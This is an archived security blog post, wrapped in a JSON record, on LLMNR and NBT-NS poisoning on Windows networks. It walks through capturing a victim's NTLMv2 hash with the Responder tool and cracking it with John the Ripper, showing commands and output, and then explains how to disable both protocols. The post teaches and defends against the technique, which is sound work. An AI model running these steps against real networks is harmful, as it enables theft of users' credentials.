{
	"id": "73a59442-feea-4bd0-8ad1-fa817dedf085",
	"created_at": "2026-04-06T00:12:33.688354Z",
	"updated_at": "2026-04-10T03:20:36.89226Z",
	"deleted_at": null,
	"sha1_hash": "49a67d34f60465f9424b32d4360ab37fd32afa86",
	"title": "Local Network Attacks: LLMNR and NBT-NS Poisoning",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 508456,
	"plain_text": "Local Network Attacks: LLMNR and NBT-NS Poisoning\r\nBy Jon Sternstein\r\nPublished: 2013-11-16 · Archived: 2026-04-05 21:24:03 UTC\r\nBackground\r\nHow can an attacker capture usernames and passwords on a local network by simply waiting for the computers to\r\nwillingly give them up?  LLMNR and NBT-NS poisoning!\r\nLink-Local Multicast Name Resolution (LLMNR) and Netbios Name Service (NBT-NS) are two components of\r\nMicrosoft Windows machines.  LLLMNR was introduced in Windows Vista and is the successor to NBT-NS.\r\nThey are both seemingly innocuous components which allow machines on the same subnet help each other\r\nidentify hosts when DNS fails.  So if one machine tries to resolve a particular host, but DNS resolution fails, the\r\nmachine will then attempt to ask all other machines on the local network for the correct address via LLMNR or\r\nNBT-NS.\r\nThis seems harmless in theory, but it opens up a major vulnerability that attackers can use to gain full credentials\r\nto a system.\r\nVulnerability\r\nAn attacker can listen on a network for these LLMNR (UDP/5355) or NBT-NS (UDP/137) broadcasts and\r\nrespond to them, thus pretending that the attacker knows the location of the requested host.  \r\nLet’s look at an example in the diagram below.  \r\n1. The victim machine wants to go the print server at \\\\printserver, but mistakenly types in \\\\pintserver.  \r\n2. The DNS server responds to the victim saying that it doesn’t know that host.\r\n3. The victim then asks if there is anyone on the local network that knows the location of \\\\pintserver\r\n4. The attacker responds to the victim saying that it is the \\\\pintserver\r\n5. The victim believes the attacker and sends its own username and NTLMv2 hash to the attacker.\r\n6. 
The attacker can now crack the hash to discover the password\r\nhttps://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nPage 1 of 7\n\nAttack Tools\r\nThere are several tools that will allow you to act out the attack scenario detailed above.  One of the originals is\r\nNBNSpoof by Wesley McGrew (http://www.mcgrewsecurity.com/tools/nbnspoof/).  McGrew explains on his website\r\nhow to create a tool to carry out such an attack.  Metasploit has an LLMNR Spoofer module\r\nauxiliary/spoof/llmnr/llmnr_response (http://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response).\r\n The tool we will use today is “Responder” from SpiderLabs (https://github.com/SpiderLabs/Responder.git). \r\n1. Download the Responder software: git clone https://github.com/SpiderLabs/Responder.git\r\n2. Run the Responder help menu: python Responder.py -h\r\nNotice a couple mandatory options:\r\n-i [IP] : the attacker’s IP address (or the IP address to send the traffic to)\r\n-b [0/1]: Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.\r\nIn addition to those options, there are many switches which allow you to turn on or off various services to poison\r\n– http, https, smb, sql, ftp, ldap, dns, etc…  \r\nLet’s follow the example in the image above.  \r\n1.  To set things up, the attacker at 192.168.1.77 starts responder with “python Responder.py -I eth0 -wfv”.  \r\n#python Responder.py -I eth0 7 -wfv\r\nNBT Name Service/LLMNR Answerer 1.0.\r\nTo kill this script hit CRTL-C\r\n[+]NBT-NS \u0026 LLMNR responder started\r\nGlobal Parameters set\r\nChallenge set is: 1122334455667788\r\nWPAD Proxy Server is:On\r\nHTTP Server is:ON\r\nSMB Server is:ON\r\nSQL Server is:ON\r\nFTP Server is:ON\r\nDNS Server is:ON\r\nLDAP Server is:ON\r\nFingerPrint Module is:OFF\r\n2. 
The victim at 192.168.1.74 tries to go to \\\\pintserver which doesn’t exist.\r\n3.  The victim asks anyone on the local network for help identifying the \\\\pintserver\r\n4.  The attacker responds\r\n5.  The victim sends their credentials to the attacker.\r\nLLMNR poisoned answer sent to this IP: 192.168.1.74. The requested name was : pintserver.\r\n[+]SMB-NTLMv2 hash captured from : 192.168.1.74\r\nDomain is : WORKGROUP\r\nUser is : testuser\r\n[+]SMB complete hash is : testuser::WORKGROUP:\r\n1122334455667788:834735BBB9FBC3B168F1A721C5888E39:01010000000000004F51B4E9FADFCE01A7ABBB61969951540000000002000A0073006D0062\r\n6. The Responder program stores the credentials in a file in the local directory called SMB-NTLMv2-Client-192.168.1.74.txt\r\n7. The Attacker runs john the ripper against the file with the “john SMB-NTLMv2-Client-192.168.1.74.txt”\r\ncommand and John the Ripper immediately discovers the password of “password1”\r\n#john SMB-NTLMv2-Client-192.168.1.74.txt\r\nLoaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64])\r\npassword1 (testuser)\r\nguesses: 1 time: 0:00:00:00 DONE (Tue Nov 12 15:56:46 2013) c/s: 114620 trying: 123456 - crawford\r\nUse the \"--show\" option to display all of the cracked passwords reliably\r\nPacket Capture\r\nLet’s look at what’s happening at the network level.\r\n1. You can see the victim at 192.168.1.74 making a name query to the DNS server for “pintserver”.\r\n2. The DNS doesn’t know the host.\r\n3. The victim then makes an LLMNR broadcast for “pintserver”.\r\n4. The attacker at 192.168.1.77 responds.\r\n5. The victim creates an SMB connection to the attacker and sends its username and password hash.\r\nProtective Measures\r\nFixing the issue is easy:  \r\nDisable LLMNR and NBT-NS.  You need to disable both because if LLMNR is disabled, it will\r\nautomatically attempt to use NBT-NS instead.  
See the instructions below.\r\nPrevent inter-VLAN communication – By limiting communication between hosts on the same network,\r\nyou greatly reduce the success of most local network attacks.\r\nUse limited user accounts – Now this won’t prevent an attack, but it will limit the damage that a successful\r\nattack can do and at least make an attacker work harder.  For example, if the victim is using “domain\r\nadmin” credentials, then a successful attack would give up access to all machines on the network.  On\r\nthe other hand, if the victim is using a limited account, then the attacker will need to work harder to get\r\nfurther access in the environment.\r\nTo disable LLMNR on Windows:\r\n1. Click Start\r\n2. Type gpedit.msc in the text box \r\n3. Navigate to Local Computer Policy -\u003e Computer Configuration -\u003e Administrative Templates -\u003e Network -\u003e\r\nDNS Client\r\n4. In the DNS Client Folder, double click on “Turn Off Multicast Name Resolution” and set it to\r\n“Enabled”\r\nThe following registry key is set on computers when LLMNR is disabled:\r\nHKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient\r\n“EnableMulticast” DWORD 0\r\nTo disable NetBIOS Name Service on a single machine:\r\n1. Open Control Panel\r\n2. Under “Network and Internet”, click “View network status and tasks”\r\n3. Click “Change adapter settings”\r\n4. Right-click “Local area connection” and then click “Properties”\r\n5. Double-click on “Internet Protocol Version 4 (TCP/IPv4)”, click “Advanced” then click on the “WINS”\r\n(Windows Internet Name Service) tab\r\n6. Click on “Disable NetBIOS over TCP/IP”\r\nTo disable NetBIOS Name Service across a domain with DHCP clients:\r\n1. Go to the DHCP Snap-In\r\n2. Go to “scope options” for the network you are changing\r\n3. 
Right click and Configure Options\r\n4. Select Advanced tab and change “Vendor class” to “Microsoft Windows 2000 Options”.\r\n5. In the “Available Options” frame, select and check the box “001 Microsoft Disable Netbios Option”\r\n6. In the “Data Entry” frame, change the data entry to 0x2\r\n7. Click “OK”.  The new settings will take effect when the clients renew their addresses.\r\nDisabling NetBios through DHCP configuration (Fine, 2011)\r\nReferences\r\n1. McGrew, Wesley. (2007, March 22). NetBIOS Name Service\r\nSpoofing. http://www.mcgrewsecurity.com/2007/03/22/netbios-name-service-spoofing/\r\n2. Gaffie, Laurent. (2012, October 24). Introducing Responder-1.0. http://blog.spiderlabs.com/2012/10/introducing-responder-10.html\r\n3. Fine, P. (2011, January 13). So long NetBIOS, it’s been fun! Retrieved from Exit | the | Fast | Lane:\r\nhttp://www.exitthefastlane.com/2011/01/so-long-netbios-its-been-fun.html\r\n4. MITRE. (2021, September 28). Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay.\r\nRetrieved from MITRE ATT\u0026CK: https://attack.mitre.org/techniques/T1557/001/\r\nSource: https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning"
	],
	"report_names": [
		"local-network-attacks-llmnr-and-nbt-ns-poisoning"
	],
	"threat_actors": [],
	"ts_created_at": 1775434353,
	"ts_updated_at": 1775791236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/49a67d34f60465f9424b32d4360ab37fd32afa86.pdf",
		"text": "https://archive.orkl.eu/49a67d34f60465f9424b32d4360ab37fd32afa86.txt",
		"img": "https://archive.orkl.eu/49a67d34f60465f9424b32d4360ab37fd32afa86.jpg"
	}
}